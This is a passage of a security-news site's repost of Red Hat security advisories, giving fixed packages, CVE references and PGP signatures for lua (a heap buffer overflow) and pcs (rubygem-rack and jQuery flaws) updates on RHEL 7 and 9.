https://access.redhat.com/security/cve/CVE-2022-29901  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/solutions/6971358

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY2K9NtzjgjWX9erEAQjkRRAAm/2K718txKtGuCBa6NclLP2TpOKlk8dw  
R3eORyTgVZTrl6Qm6RQSA50kcqMFn6/6hzUto5NRvuSgw4H7I2hg/CS+TQlPdFi4  
0WcZiZ0vbu7csrsAtAKpmWOpu1O1FzNdqSF5MA7s7zZ0oht9ZnszT+exzcjHbgpO  
qVMRhgaKmbdlKkKi/32gZP7IwKIZS+CkhqpHhFy7V736FtNyWFT0VNCHdKCklkdP  
K6gAClFQuMv8npxovTURJfhLjqv6ymcRVrl6KQT3Qlu+iHiy0j18CA3ewW0TdAkO  
IzDOEh+W9gfTR4bgrrUl5+A5oZkkazYqm6joGJBI7uZHv9v3yoOLzP4HAduSVFBC  
AgBo9yhGnP6xXzunT5nYVs0EpnCpHFaJhlxsavm/pKjS+c35enuawyN2l24kACnE  
Kdv3KZ6XQtBTdaR9e/UTqCCiSXznEcJJ0xE4VfKFNtngXrWGftAIcTBMDQpfePP7  
rfBo/C9IT8rKqt1T62M0Xu+NfjoeziKrpPoXi86rn90bw93Mdl0rrmAhTISeL92K  
M5m5DIyPD9HQuX4/3NKWXJDEKgPao+JFouEAlm86YMfFzjxzBE8GXTnvp2xw5vf1  
BJkFxtUe74jR8YqJYO7KxyOS9K9Z7BeqEcvSRwNdBAY6TgcDa5lB347Kcgl1WvDf  
SmJAIcuqXRk=WLhk  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-7338-01

Red Hat Security Advisory 2022-7329-01 - The lua packages provide support for Lua, a powerful light-weight programming language designed for extending applications. Lua is also frequently used as a general-purpose, stand-alone language. Issues addressed include a buffer overflow vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: lua security update  
Advisory ID:       RHSA-2022:7329-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7329  
Issue date:        2022-11-02  
CVE Names:         CVE-2022-33099  
====================================================================  
1. Summary:

An update for lua is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

The lua packages provide support for Lua, a powerful light-weight  
programming language designed for extending applications. Lua is also  
frequently used as a general-purpose, stand-alone language.

Security Fix(es):

* lua: heap buffer overflow in luaG_errormsg() in ldebug.c due to  
uncontrolled recursion in error handling (CVE-2022-33099)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2104427 - CVE-2022-33099 lua: heap buffer overflow in luaG_errormsg() in ldebug.c due to uncontrolled recursion in error handling

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

aarch64:  
lua-5.4.2-4.el9_0.3.aarch64.rpm  
lua-debuginfo-5.4.2-4.el9_0.3.aarch64.rpm  
lua-debugsource-5.4.2-4.el9_0.3.aarch64.rpm  
lua-libs-debuginfo-5.4.2-4.el9_0.3.aarch64.rpm

ppc64le:  
lua-5.4.2-4.el9_0.3.ppc64le.rpm  
lua-debuginfo-5.4.2-4.el9_0.3.ppc64le.rpm  
lua-debugsource-5.4.2-4.el9_0.3.ppc64le.rpm  
lua-libs-debuginfo-5.4.2-4.el9_0.3.ppc64le.rpm

s390x:  
lua-5.4.2-4.el9_0.3.s390x.rpm  
lua-debuginfo-5.4.2-4.el9_0.3.s390x.rpm  
lua-debugsource-5.4.2-4.el9_0.3.s390x.rpm  
lua-libs-debuginfo-5.4.2-4.el9_0.3.s390x.rpm

x86_64:  
lua-5.4.2-4.el9_0.3.x86_64.rpm  
lua-debuginfo-5.4.2-4.el9_0.3.x86_64.rpm  
lua-debugsource-5.4.2-4.el9_0.3.x86_64.rpm  
lua-libs-debuginfo-5.4.2-4.el9_0.3.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 9):

Source:  
lua-5.4.2-4.el9_0.3.src.rpm

aarch64:  
lua-debuginfo-5.4.2-4.el9_0.3.aarch64.rpm  
lua-debugsource-5.4.2-4.el9_0.3.aarch64.rpm  
lua-libs-5.4.2-4.el9_0.3.aarch64.rpm  
lua-libs-debuginfo-5.4.2-4.el9_0.3.aarch64.rpm

ppc64le:  
lua-debuginfo-5.4.2-4.el9_0.3.ppc64le.rpm  
lua-debugsource-5.4.2-4.el9_0.3.ppc64le.rpm  
lua-libs-5.4.2-4.el9_0.3.ppc64le.rpm  
lua-libs-debuginfo-5.4.2-4.el9_0.3.ppc64le.rpm

s390x:  
lua-debuginfo-5.4.2-4.el9_0.3.s390x.rpm  
lua-debugsource-5.4.2-4.el9_0.3.s390x.rpm  
lua-libs-5.4.2-4.el9_0.3.s390x.rpm  
lua-libs-debuginfo-5.4.2-4.el9_0.3.s390x.rpm

x86_64:  
lua-debuginfo-5.4.2-4.el9_0.3.i686.rpm  
lua-debuginfo-5.4.2-4.el9_0.3.x86_64.rpm  
lua-debugsource-5.4.2-4.el9_0.3.i686.rpm  
lua-debugsource-5.4.2-4.el9_0.3.x86_64.rpm  
lua-libs-5.4.2-4.el9_0.3.i686.rpm  
lua-libs-5.4.2-4.el9_0.3.x86_64.rpm  
lua-libs-debuginfo-5.4.2-4.el9_0.3.i686.rpm  
lua-libs-debuginfo-5.4.2-4.el9_0.3.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 9):

aarch64:  
lua-debuginfo-5.4.2-4.el9_0.3.aarch64.rpm  
lua-debugsource-5.4.2-4.el9_0.3.aarch64.rpm  
lua-devel-5.4.2-4.el9_0.3.aarch64.rpm  
lua-libs-debuginfo-5.4.2-4.el9_0.3.aarch64.rpm

ppc64le:  
lua-debuginfo-5.4.2-4.el9_0.3.ppc64le.rpm  
lua-debugsource-5.4.2-4.el9_0.3.ppc64le.rpm  
lua-devel-5.4.2-4.el9_0.3.ppc64le.rpm  
lua-libs-debuginfo-5.4.2-4.el9_0.3.ppc64le.rpm

s390x:  
lua-debuginfo-5.4.2-4.el9_0.3.s390x.rpm  
lua-debugsource-5.4.2-4.el9_0.3.s390x.rpm  
lua-devel-5.4.2-4.el9_0.3.s390x.rpm  
lua-libs-debuginfo-5.4.2-4.el9_0.3.s390x.rpm

x86_64:  
lua-5.4.2-4.el9_0.3.i686.rpm  
lua-debuginfo-5.4.2-4.el9_0.3.i686.rpm  
lua-debuginfo-5.4.2-4.el9_0.3.x86_64.rpm  
lua-debugsource-5.4.2-4.el9_0.3.i686.rpm  
lua-debugsource-5.4.2-4.el9_0.3.x86_64.rpm  
lua-devel-5.4.2-4.el9_0.3.i686.rpm  
lua-devel-5.4.2-4.el9_0.3.x86_64.rpm  
lua-libs-debuginfo-5.4.2-4.el9_0.3.i686.rpm  
lua-libs-debuginfo-5.4.2-4.el9_0.3.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-33099  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY2K9JdzjgjWX9erEAQheTg//aflei8nmLalr43qUBKZqkDaEPMrvlVQr  
H2425hQv6zIUUNsk+3N+BqJUMMLziVIkBv5o71NFMh16JMqXGrzeNrwPAGVyIt6N  
8AX7vTuOIeJ8fF5RcdOUWHQxodQUMFkrvJjLcVUVHEXfdOllJrep+/l00DmDstBJ  
OumrhkgvBKFHx8krDIl765PO5p0Z5Cfz6rLnfVLMcW9KAkLRlEdGPo3xcIsHAhLV  
xYB/UHuNFo45yArnAX2oBdveS7PB+xzTn/B4I3Bxdjd+fZAzVl2WDlHNwPHPeFHV  
5CYwW5Mfvrm1PcV4pR+RUb7I89o6EZgM70iyhMcK5HcllEPuYcfZXjeQVHadc+aM  
wbY1yTbpY2fUWAKSKs+kM37lUAF/sxBkQAL2CjzquHMwLDa+0RDqjnrVI2t4k6JY  
OMfOC379Y3F23KpH5bYGwrJs3X/0cFkXoye0nnkYTls7/sJ4Uyxy/BdSyzydPwJo  
wVnVmuxV4BwNQ9vGZC+JuGXM/G1Hee3gnU9Cb60+RhPWPCWBwKSnKpULt1jbt4xO  
n7ZfV6W5YNXcqU1DzQU0e644sLpTHeetgy/QIZfMcTEJl5dNKoFf/mj9SpSCILFa  
yn3eu2mp/KSEZ+CXtV0jNwYI6wfsVaWDbi34KK20AAbLI/mSHUV0Pcl7++4IP6V0  
NRgW2g5QG04=WQH9  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-7329-01

Red Hat Security Advisory 2022-7343-01 - The pcs packages provide a command-line configuration system for the Pacemaker and Corosync utilities. Issues addressed include code execution and denial of service vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: pcs security update  
Advisory ID:       RHSA-2022:7343-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7343  
Issue date:        2022-11-02  
CVE Names:         CVE-2019-11358 CVE-2022-30123  
====================================================================  
1. Summary:

An update for pcs is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server High Availability (v. 7) - ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Resilient Storage (v. 7) - ppc64le, s390x, x86_64

3. Description:

The pcs packages provide a command-line configuration system for the  
Pacemaker and Corosync utilities.

Security Fix(es):

* rubygem-rack: crafted requests can cause shell escape sequences  
(CVE-2022-30123)

* jquery: Prototype pollution in object's prototype leading to denial of  
service, remote code execution, or property injection (CVE-2019-11358)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

1701972 - CVE-2019-11358 jquery: Prototype pollution in object's prototype leading to denial of service, remote code execution, or property injection  
2099524 - CVE-2022-30123 rubygem-rack: crafted requests can cause shell escape sequences

6. Package List:

Red Hat Enterprise Linux Server High Availability (v. 7):

Source:  
pcs-0.9.169-3.el7_9.3.src.rpm

ppc64le:  
pcs-0.9.169-3.el7_9.3.ppc64le.rpm  
pcs-debuginfo-0.9.169-3.el7_9.3.ppc64le.rpm  
pcs-snmp-0.9.169-3.el7_9.3.ppc64le.rpm

s390x:  
pcs-0.9.169-3.el7_9.3.s390x.rpm  
pcs-debuginfo-0.9.169-3.el7_9.3.s390x.rpm  
pcs-snmp-0.9.169-3.el7_9.3.s390x.rpm

x86_64:  
pcs-0.9.169-3.el7_9.3.x86_64.rpm  
pcs-debuginfo-0.9.169-3.el7_9.3.x86_64.rpm  
pcs-snmp-0.9.169-3.el7_9.3.x86_64.rpm

Red Hat Enterprise Linux Server Resilient Storage (v. 7):

Source:  
pcs-0.9.169-3.el7_9.3.src.rpm

ppc64le:  
pcs-0.9.169-3.el7_9.3.ppc64le.rpm  
pcs-debuginfo-0.9.169-3.el7_9.3.ppc64le.rpm  
pcs-snmp-0.9.169-3.el7_9.3.ppc64le.rpm

s390x:  
pcs-0.9.169-3.el7_9.3.s390x.rpm  
pcs-debuginfo-0.9.169-3.el7_9.3.s390x.rpm  
pcs-snmp-0.9.169-3.el7_9.3.s390x.rpm

x86_64:  
pcs-0.9.169-3.el7_9.3.x86_64.rpm  
pcs-debuginfo-0.9.169-3.el7_9.3.x86_64.rpm  
pcs-snmp-0.9.169-3.el7_9.3.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2019-11358  
https://access.redhat.com/security/cve/CVE-2022-30123  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY2K9MNzjgjWX9erEAQidcA/8CUbH4WDxWDMMNSSKsc1vptCYXSg3/P52  
LArMtnekhn6ZEle0RsB+d7WuHFnA9uQNSKo0pV8ppegAUQqBnfdJlltk43BGjbA2  
mGVa2/DCJn80WcWw17vzNO3T/1HM9hbIo0APahsfafuQVGXTHkjBKLM8tpL+ie3G  
2aAKrDpziMf1/gTg/YxS4jm7pqjIFXJAOVdDZ0jNit9wnzkFJ5JVrAY1GV9+Ckwk  
uAFomsDExOuGR6ZWE1LDona68EaLgamT9F5O1+z5Z7TejbG2ZkEEAAlFmi5Z7tS/  
EuVvR9BjCU8+gvV700HiguD1Ip2hPGVObKjPSFIwSvNf2siuL64/AZs3yaYOTvhf  
u5IHHJPXjCO7FeGSWY0/IH5nohb4Dtz2TK+cUg9ItbDg0k0FwMx/UfZsNwVl7asn  
kfUwf4os/ZuFGn5CcnyqN6wo/sc/0VfNCZ2ldFz0yhaLaJPIWCso1sTxww+ZLlgV  
XQAirYvcug3IdyK5wusZytMPwjghGICgMidxXUttk8cv0jAC1yFM4x1B/BLqjhWS  
uKCh7zDJB2GcBH0M4THybXYG5OwHk2QfoqW103O8ELoaZsBJg6OAYzqHXvCjivsa  
tmt7XbY9xymrVb6JOrXiTqhDGBayqxuc+OzhnzXMHwrfrZMCO78u25zb+te9EzOy  
vveGvf6xVl4=RMfQ  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm